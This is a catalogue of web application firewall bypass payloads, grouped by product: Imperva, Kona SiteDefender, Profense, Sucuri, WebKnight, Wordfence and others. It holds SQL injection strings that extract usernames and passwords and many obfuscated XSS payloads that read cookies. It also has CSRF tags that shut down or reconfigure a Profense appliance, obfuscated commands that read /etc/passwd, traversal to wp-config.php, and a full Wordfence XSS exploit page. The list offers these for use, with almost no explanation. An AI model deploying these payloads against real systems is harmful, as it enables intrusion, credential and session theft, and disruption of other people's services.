SQLi Bypass by @Travis Lee (v2.2) 
amUserId=1 union select username,password,3,4 from users 

	

		SQLi Bypass by @Roberto Salgado (v2.2) 
	
%0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201 

	

		SQLi Bypass by @Georgi Geshev (v2.2) 
	
1%0bAND(SELECT%0b1%20FROM%20mysql.x)


	

		SQLi Bypass by @SQLMap Devs (v2.2) 
	
%40%40new%20union%23sqlmapsqlmap...%0Aselect%201,2,database%23sqlmap%0A%28%29 

	

		SQLi Bypass by @HackPlayers (v2.2) 
	
%0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201 

	

		Imperva
	
	

		Imperva SecureSphere 13 - Remote Command Execution by @rsp3ar
	
	

		XSS Bypass by @David Y 
	
<svg onload\r\n=$.globalEval("al"+"ert()");>


	

		XSS Bypass by @Emad Shanab 
	
<svg/onload=self[`aler`%2b`t`]`1`> anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz


	

		XSS Bypass by @WAFNinja 
	
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E


	

		XSS Bypass by @i_bo0om 
	
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';> <img/src=q onerror='new Function`al\ert\`1\``'> 

	

		XSS Bypass by @c0d3g33k 
	
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>


	

		SQLi Bypass by @DRK1WI 
	
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having' 

	

		SQLi by @Giuseppe D’Amore 
	
stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1 
Imperva SecureSphere <= v13 - Privilege Escalation by @0x09AL 
	

		Kona SiteDefender
	
	

		HTML Injection by @sp1d3rs 
	
%2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E


	

		XSS Bypass by @Jonathan Bouman 
	
<body%20alt=al%20lang=ert%20onmouseenter="top['al'+lang](/PoC%20XSS%20Bypass%20by%20Jonathan%20Bouman/)" 

	

		XSS Bypass by @zseano 
	
?"></script><base%20c%3D=href%3Dhttps:\mysite> 

	

		XSS Bypass by @0xInfection 
	
<abc/onmouseenter=confirm%60%60>


	

		XSS Bypass by @sp1d3rs 
	
%2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E


	

		XSS Bypass by @Frans Rosén 
	
<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;> 

	

		XSS Bypass by @Ishaq Mohammed 
	
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>


	

		Profense
	
	

		GET Type CSRF Attack by @Michael Brooks (>= v.2.6.2)
	
	

		Turn off Proface Machine 
	
<img src=https://host:2000/ajax.html?action=shutdown> 
	

		Add a proxy 
	
<img src=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save> 
	

		XSS Bypass by @Michael Brooks (>= v.2.6.2) 
	
https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script> 
	

		XSS Bypass by @EnableSecurity (>= v2.4) 
	
%3CEvil%20script%20goes%20here%3E=%0AByPass %3Cscript%3Ealert(document。cookie)%3C/script%20ByPass%3E

	

		QuickDefense
	
	

		XSS Bypass by @WAFNinja 
	
?<input type="search" onsearch="aler\u0074(1)"> <details ontoggle=alert(1)> 

	

		Sucuri
	
	

		Smuggling RCE Payloads by @theMiddle 
	
/???/??t+/???/??ss??


	

		Obfuscating RCE Payloads by @theMiddle 
	
;+cat+/e'tc/pass'wd
c\\a\\t+/et\\c/pas\\swd


	

		XSS Bypass by @Luka 
	
"><input/onauxclick="[1].map(prompt)"> 

	

		XSS Bypass by @Brute Logic 
	
data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post>
<input type=hidden name=a value="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>">
<input type=submit></form>


	

		URLScan
	
	

		Directory Traversal by @ZeQ3uL (<= v3.1) (Only on ASP.NET) 
	
http://host.com/test.asp?file=.%./bla.txt

	

		WebARX
	
	

		Cross Site Scripting by @0xInfection 
	
<a69/onauxclick=open&#40&#41>rightclickhere


	

		WebKnight
	
	

		Cross Site Scripting by @WAFNinja 
	
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image> <marquee/onstart=confirm(2)> <details ontoggle=alert(1)> <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)"> <img src=x onwheel=prompt(1)> 

	

		SQLi by @WAFNinja 
	
0 union(select 1,username,password from(users)) 0 union(select 1,@@hostname,@@datadir)


	

		XSS Bypass by @Aatif Khan (v4.1) 
	
<details ontoggle=alert(1)> <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)"> 

	

		SQLi Bypass by @ZeQ3uL 
	
10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)


	

		Wordfence
	
	

		XSS Bypass by @brute Logic 
	
<a href=javas&#99;ript:alert(1)> 

	

		XSS Bypass by @0xInfection 
	
<a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At&colon;/**/alert()/**/>click


	

		HTML Injection by @Voxel 
	
http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

	

		XSS Exploit by @MustLive (>= v3.3.5) 
	
<html> <head> <title>Wordfence Security XSS exploit (C) 2012 MustLive.
http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post"> <input type="hidden" name="email" value="<script>alert(document。cookie)</script>"> </form> </body> </html> 

	

		Other XSS Bypasses 
	
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>" >><marquee loop=1 width=0 onfinish=alert(1)>


	

		Apache Generic
	
	

		Writing method type in lowercase by @i_bo0om 
	
get /login HTTP/1.1 Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

	

		IIS Generic

	
	

		Tabs before method by @i_bo0om 
	
GET /login.php HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)